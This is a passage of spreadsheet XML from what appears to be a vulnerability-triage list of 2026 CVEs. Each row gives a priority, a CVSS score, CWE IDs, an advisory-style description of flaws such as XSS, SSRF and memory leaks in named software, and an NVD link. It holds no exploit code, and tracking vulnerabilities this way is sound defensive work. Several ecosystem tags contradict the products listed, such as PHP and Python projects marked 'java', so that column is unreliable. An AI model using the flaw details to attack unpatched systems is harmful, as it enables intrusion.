        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73422</t>
        </is>
      </c>
    </row>
    <row r="2053">
      <c r="A2053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73508</t>
        </is>
      </c>
      <c r="C2053" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2053" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2053" s="5" t="inlineStr"/>
      <c r="F2053" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2053" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2053" s="5" t="inlineStr"/>
      <c r="I2053" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2053" s="5" t="inlineStr"/>
      <c r="K2053" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="L2053" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.dns.AbstractDnsRecord, io.netty.handler.codec.dns.DefaultDnsRecordDecoder.decodeRecord(), and io.netty.handler.codec.dns.DnsCodecUtil.decompressDomainName() failed to release retained or newly allocated ByteBuf objects when IDN.toASCII() or encodeDomainName() rejected a malformed domain name, allowing unauthenticated remote DNS packets to leak direct memory incrementally until denial of service. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.</t>
        </is>
      </c>
      <c r="M2053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73508</t>
        </is>
      </c>
    </row>
    <row r="2054">
      <c r="A2054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73531</t>
        </is>
      </c>
      <c r="C2054" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2054" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2054" s="5" t="inlineStr"/>
      <c r="F2054" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2054" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2054" s="5" t="inlineStr"/>
      <c r="I2054" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2054" s="5" t="inlineStr"/>
      <c r="K2054" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2054" s="5" t="inlineStr">
        <is>
          <t>django-helpdesk before 2.3.3 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject arbitrary JavaScript by submitting HTML-formatted email messages or uploading .html/.htm file attachments through public ticket submission channels. Attackers can exploit the lack of sanitization and Content-Disposition headers at the attachment-serving layer to execute malicious scripts in the browser session of authenticated staff members who open the attachment while triaging tickets.</t>
        </is>
      </c>
      <c r="M2054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73531</t>
        </is>
      </c>
    </row>
    <row r="2055">
      <c r="A2055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73555</t>
        </is>
      </c>
      <c r="C2055" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2055" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2055" s="5" t="inlineStr"/>
      <c r="F2055" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2055" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2055" s="5" t="inlineStr"/>
      <c r="I2055" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2055" s="5" t="inlineStr"/>
      <c r="K2055" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L2055" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. Prior to 0.26.0, the validation_exception_handler in vllm/entrypoints/openai/server_utils.py converts FastAPI RequestValidationError objects with str(exc), and sanitize_message in vllm/entrypoints/utils.py does not remove traceback-style file paths, allowing unauthenticated malformed JSON requests to /v1/chat/completions, /v1/completions, /tokenize, and /detokenize to disclose the OS username, home and virtual-environment paths, Python version, internal package structure, line numbers, and endpoint handler names. This issue is fixed in version 0.26.0.</t>
        </is>
      </c>
      <c r="M2055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73555</t>
        </is>
      </c>
    </row>
    <row r="2056">
      <c r="A2056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73565</t>
        </is>
      </c>
      <c r="C2056" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2056" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2056" s="5" t="inlineStr"/>
      <c r="F2056" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2056" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2056" s="5" t="inlineStr"/>
      <c r="I2056" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2056" s="5" t="inlineStr"/>
      <c r="K2056" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-770</t>
        </is>
      </c>
      <c r="L2056" s="5" t="inlineStr">
        <is>
          <t>@hono/node-server allows running the Hono application on Node.js. From 2.0.0 until 2.0.10, a WebSocket upgrade request to an upgradeWebSocket route with a missing or malformed Sec-WebSocket-Key header causes src/websocket.ts to retain the request's IncomingMessage in waiterMap and leave waitForWebSocket pending because ws.handleUpgrade emits no connection event. The aborted handshake therefore has no cleanup path, allowing an unauthenticated attacker to flood a public route, cause unbounded memory growth, and eventually make the service unavailable. This issue is fixed in version 2.0.10.</t>
        </is>
      </c>
      <c r="M2056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73565</t>
        </is>
      </c>
    </row>
    <row r="2057">
      <c r="A2057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73628</t>
        </is>
      </c>
      <c r="C2057" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2057" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2057" s="5" t="inlineStr"/>
      <c r="F2057" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2057" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2057" s="5" t="inlineStr"/>
      <c r="I2057" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2057" s="5" t="inlineStr"/>
      <c r="K2057" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2057" s="5" t="inlineStr">
        <is>
          <t>Serendipity versions &gt;= 2.3.5 and &lt;= 2.6.0 contain a reflected cross-site scripting vulnerability in the search clean-URL route (/search/&lt;term&gt;). In include/functions_routing.inc.php serveSearch(), the sanitisation pipeline runs urldecode() after HTML-encoding, so a single URL-encoded HTML payload survives strip_tags() and htmlspecialchars() and is then decoded back into live HTML in the page. A crafted search link can execute arbitrary JavaScript in the victim's browser. Fixed in 2.6.1.</t>
        </is>
      </c>
      <c r="M2057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73628</t>
        </is>
      </c>
    </row>
    <row r="2058">
      <c r="A2058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73840</t>
        </is>
      </c>
      <c r="C2058" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2058" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2058" s="5" t="inlineStr"/>
      <c r="F2058" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2058" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2058" s="5" t="inlineStr"/>
      <c r="I2058" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2058" s="5" t="inlineStr"/>
      <c r="K2058" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="L2058" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.3, 1.1.3, and 1.2.0-rc.2, the POST /api/v1alpha1/autobuild endpoint in internal/openchoreo-api/api/handlers/webhook_handler.go selected a webhook provider from caller-controlled X-Event-Key, accepted Bitbucket requests without HMAC-SHA256 in X-Hub-Signature or a configured bitbucket-secret, and allowed unauthenticated build triggers for components matched by repository URL and branch, including cross-provider triggers using attacker-supplied commit SHAs. This issue is fixed in versions 1.0.3, 1.1.3, and 1.2.0-rc.2.</t>
        </is>
      </c>
      <c r="M2058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73840</t>
        </is>
      </c>
    </row>
    <row r="2059">
      <c r="A2059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77310</t>
        </is>
      </c>
      <c r="C2059" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2059" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2059" s="5" t="inlineStr"/>
      <c r="F2059" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2059" s="5" t="inlineStr">
        <is>
          <t>java, .net</t>
        </is>
      </c>
      <c r="H2059" s="5" t="inlineStr"/>
      <c r="I2059" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2059" s="5" t="inlineStr"/>
      <c r="K2059" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2059" s="5" t="inlineStr">
        <is>
          <t>jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. Prior to versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1 on their respective release lines, the java.net.InetAddress branch of FromStringDeserializer.Std._deserialize() calls InetAddress.getByName() on attacker-controlled input, causing eager DNS resolution during deserialization and enabling DNS-based server-side request forgery and internal-host enumeration. This issue is fixed in versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1.</t>
        </is>
      </c>
      <c r="M2059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77310</t>
        </is>
      </c>
    </row>
    <row r="2060">
      <c r="A2060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78446</t>
        </is>
      </c>
      <c r="C2060" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2060" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2060" s="5" t="inlineStr"/>
      <c r="F2060" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2060" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2060" s="5" t="inlineStr"/>
      <c r="I2060" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2060" s="5" t="inlineStr"/>
      <c r="K2060" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2060" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t>
        </is>
      </c>
    </row>
    <row r="2061">
      <c r="A2061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78631</t>
        </is>
      </c>
      <c r="C2061" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2061" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2061" s="5" t="inlineStr"/>
      <c r="F2061" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2061" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2061" s="5" t="inlineStr"/>
      <c r="I2061" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2061" s="5" t="inlineStr"/>
      <c r="K2061" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L2061" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive Agent writes the decoded SAML bearer assertion to a local application log file at the default log level on every successful MFA completion. This insertion of sensitive information into the log file makes a live authentication credential readable by any local user with access to the log file.</t>
        </is>
      </c>
      <c r="M2061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t>
        </is>
      </c>
    </row>
    <row r="2062">
      <c r="A2062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80339</t>
        </is>
      </c>
      <c r="C2062" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2062" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2062" s="5" t="inlineStr"/>
      <c r="F2062" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2062" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2062" s="5" t="inlineStr"/>
      <c r="I2062" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2062" s="5" t="inlineStr"/>
      <c r="K2062" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2062" s="5" t="inlineStr">
        <is>
          <t>The Payment Plugins for Stripe WooCommerce WordPress plugin before 4.0.12 does not validate the order key before adding order data to the JavaScript configuration it outputs on the front end, allowing unauthenticated users to obtain the billing details of any order, together with the secret that gates access to it, by iterating sequential order identifiers.</t>
        </is>
      </c>
      <c r="M2062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80339</t>
        </is>
      </c>
    </row>
    <row r="2063">
      <c r="A2063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80340</t>
        </is>
      </c>
      <c r="C2063" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2063" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2063" s="5" t="inlineStr"/>
      <c r="F2063" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2063" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2063" s="5" t="inlineStr"/>
      <c r="I2063" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2063" s="5" t="inlineStr"/>
      <c r="K2063" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2063" s="5" t="inlineStr">
        <is>
          <t>The Payment Plugins for PayPal WooCommerce WordPress plugin before 2.0.26 does not validate the order key before adding order data to the JavaScript configuration it outputs on the front end, allowing unauthenticated users to obtain the secret that gates access to any order and, through it, that customer's billing and shipping details, by iterating sequential order identifiers.</t>
        </is>
      </c>
      <c r="M2063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80340</t>
        </is>
      </c>
    </row>
    <row r="2064">
      <c r="A2064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="C2064" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2064" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2064" s="5" t="inlineStr"/>
      <c r="F2064" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2064" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H2064" s="5" t="inlineStr"/>
      <c r="I2064" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2064" s="5" t="inlineStr"/>
      <c r="K2064" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2064" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds read security issue exists in the query planning component of MongoDB Server. An authenticated user with database read and write privileges can trigger the security issue through crafted query operations, causing the server to read memory beyond allocated buffer boundaries. The revealed memory contents may be partially observable through diagnostic query statistics output.</t>
        </is>
      </c>
      <c r="M2064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="2065">
      <c r="A2065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82867</t>
        </is>
      </c>
      <c r="C2065" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2065" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2065" s="5" t="inlineStr"/>
      <c r="F2065" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2065" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2065" s="5" t="inlineStr"/>
      <c r="I2065" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2065" s="5" t="inlineStr"/>
      <c r="K2065" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2065" s="5" t="inlineStr">
        <is>
          <t>@pdfme/schemas before 5.5.9 contains a cross-site scripting vulnerability in the Select schema plugin that fails to sanitize option values before interpolating them into HTML via innerHTML. Attackers can supply malicious templates with crafted option values containing HTML and JavaScript to execute arbitrary code in users' browsers.</t>
        </is>
      </c>
      <c r="M2065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82867</t>
        </is>
      </c>
    </row>
    <row r="2066">
      <c r="A2066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82868</t>
        </is>
      </c>
      <c r="C2066" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2066" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2066" s="5" t="inlineStr"/>
      <c r="F2066" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2066" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2066" s="5" t="inlineStr"/>
      <c r="I2066" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2066" s="5" t="inlineStr"/>
      <c r="K2066" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2066" s="5" t="inlineStr">
        <is>
          <t>@pdfme/schemas before 5.5.9 contains a cross-site scripting vulnerability in the SVG schema plugin that renders user-supplied SVG content directly to innerHTML without sanitization. Attackers can inject malicious SVG with embedded scripts, event handlers, or foreignObject elements to execute arbitrary JavaScript in users' browsers when viewing or filling templates.</t>
        </is>
      </c>
      <c r="M2066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82868</t>
        </is>
      </c>
    </row>
    <row r="2067">
      <c r="A2067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84191</t>
        </is>
      </c>
      <c r="C2067" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2067" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2067" s="5" t="inlineStr"/>
      <c r="F2067" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2067" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2067" s="5" t="inlineStr"/>
      <c r="I2067" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2067" s="5" t="inlineStr"/>
      <c r="K2067" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2067" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.5.0 contains stored cross-site scripting vulnerabilities in VRF display pages where mplsVpnVrfDescription, vrf_name, and mplsVpnVrfRouteDistinguisher fields from SNMP polling are rendered without sanitization. Attackers controlling a monitored network device can inject arbitrary JavaScript through SNMP responses that executes in the browser of any user viewing VRF-related pages.</t>
        </is>
      </c>
      <c r="M2067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84191</t>
        </is>
      </c>
    </row>
    <row r="2068">
      <c r="A2068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84364</t>
        </is>
      </c>
      <c r="C2068" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2068" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2068" s="5" t="inlineStr"/>
      <c r="F2068" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2068" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2068" s="5" t="inlineStr"/>
      <c r="I2068" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2068" s="5" t="inlineStr"/>
      <c r="K2068" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2068" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.13.5, when parseBody() expands dot-separated form field names into nested objects with dot-notation parsing enabled, it does not limit the nesting depth or the total number of intermediate objects created. Empty segments are preserved, so one deeply dotted field name can encode one nesting level per byte, while a large number of shallowly dotted fields can create the same amplification across a request. A request body within a normal size limit can therefore allocate an object graph far larger than the request after the body has already been accepted. An unauthenticated attacker who can reach an affected endpoint can send concurrent requests that exhaust the JavaScript heap, terminate the server process, and leave the service unavailable until restart. Dot-notation parsing is not enabled by default, and applications using the default behavior are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="M2068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t>
        </is>
      </c>
    </row>
    <row r="2069">
      <c r="A2069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84379</t>
        </is>
      </c>
      <c r="C2069" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2069" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2069" s="5" t="inlineStr"/>
      <c r="F2069" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2069" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2069" s="5" t="inlineStr"/>
      <c r="I2069" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2069" s="5" t="inlineStr"/>
      <c r="K2069" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L2069" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.11.0, FileField.render_headers() in src/httpx2/httpx2/_multipart.py directly interpolates attacker-controlled content_type values and custom headers from the files= three-element (filename, content, content_type) tuple and the files= four-element (filename, content, content_type, headers) tuple into multipart/form-data part headers without validating header names or values. CR or LF characters can terminate a part header, inject additional part headers, or end the part header block early, allowing a downstream multipart parser to treat attacker-supplied lines as genuine headers and potentially alter part semantics or bypass header-based checks. This issue is fixed in version 2.11.0.</t>
        </is>
      </c>
      <c r="M2069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t>
        </is>
      </c>
    </row>
    <row r="2070">
      <c r="A2070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85158</t>
        </is>
      </c>
      <c r="C2070" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2070" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2070" s="5" t="inlineStr"/>
      <c r="F2070" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2070" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2070" s="5" t="inlineStr"/>
      <c r="I2070" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2070" s="5" t="inlineStr"/>
      <c r="K2070" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2070" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in videoEmbeded.php that echoes the link parameter inside an HTML comment with zero escaping. Attackers can close the comment with --&gt; and inject arbitrary JavaScript that executes when victims visit the crafted embed URL.</t>
        </is>
      </c>
      <c r="M2070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85158</t>
        </is>
      </c>
    </row>
    <row r="2071">
      <c r="A2071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85159</t>
        </is>
      </c>
      <c r="C2071" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2071" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2071" s="5" t="inlineStr"/>
      <c r="F2071" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2071" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2071" s="5" t="inlineStr"/>
      <c r="I2071" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2071" s="5" t="inlineStr"/>
      <c r="K2071" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2071" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a reflected cross-site scripting vulnerability in userLogin.php where the cancelUri parameter is echoed in an href attribute after isSafeRedirectURL checks protocol only, not HTML characters. Unauthenticated attackers can inject event handlers via relative URLs with embedded quotes to execute arbitrary JavaScript when users interact with the Cancel button.</t>
        </is>
      </c>
      <c r="M2071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85159</t>
        </is>
      </c>
    </row>
    <row r="2072">
      <c r="A2072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85230</t>
        </is>
      </c>
      <c r="C2072" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2072" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2072" s="5" t="inlineStr"/>
      <c r="F2072" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2072" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2072" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I2072" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2072" s="5" t="inlineStr"/>
      <c r="K2072" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="L2072" s="5" t="inlineStr">
        <is>
          <t>A persistent unsafe URL injection vulnerability exists in the MISP dashboard ButtonWidget configuration. Dashboard widget URLs were validated only when the widget was rendered and were not validated when the configuration was saved. As a result, an authenticated user able to modify dashboard widget settings could persist arbitrary URL values, including URLs using the javascript: scheme, through either of the dashboard settings persistence paths.
